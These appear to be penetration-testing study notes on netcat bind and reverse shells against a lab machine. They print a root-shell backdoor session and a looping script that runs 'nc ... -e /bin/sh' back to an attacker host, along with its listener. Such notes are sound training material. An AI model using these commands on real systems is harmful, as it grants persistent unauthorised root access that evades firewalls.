Shells and Reverse Shells

Netcat Shell

To use netcat as a backdoor we need to have a way to direct all communication through netcat into a shell or command prompt

Nmap scan against the Hackerdemia => nmap 192.168.1.123

The port we will look at is port 1337

When a connection is made, netcat will execute the bash shell, allowing us to interact with the system

Permissions are transferred whenever a process is launched

the bash shell will inherit the same permissions of whoever started the netcat process => system itself.

nc 192.168.1.123 1337

Backdoor connection

whomi => root

pwd => /

ifconfig => eth0 , lo ...

uname -a => Linux slax 2.6.16

We now have a backdoor that will be accessible as long as the startup script is running.

Netcat Reverse Shell

A reverse shell will often prevent firewalls from severing our connection

Reverse shell using netcat.

#!/bin/sh

while true : do

nc 192.168.1.10 1337 -e /bin/sh

done

nc -l -p 1337

Because we are root on the attack system, it really doesn’t matter which port we use

everything we send to the target system will be in cleartext => netcat does not encrypt the communication stream

If we create a backdoor in a penetration test, we will need to be able to remove them later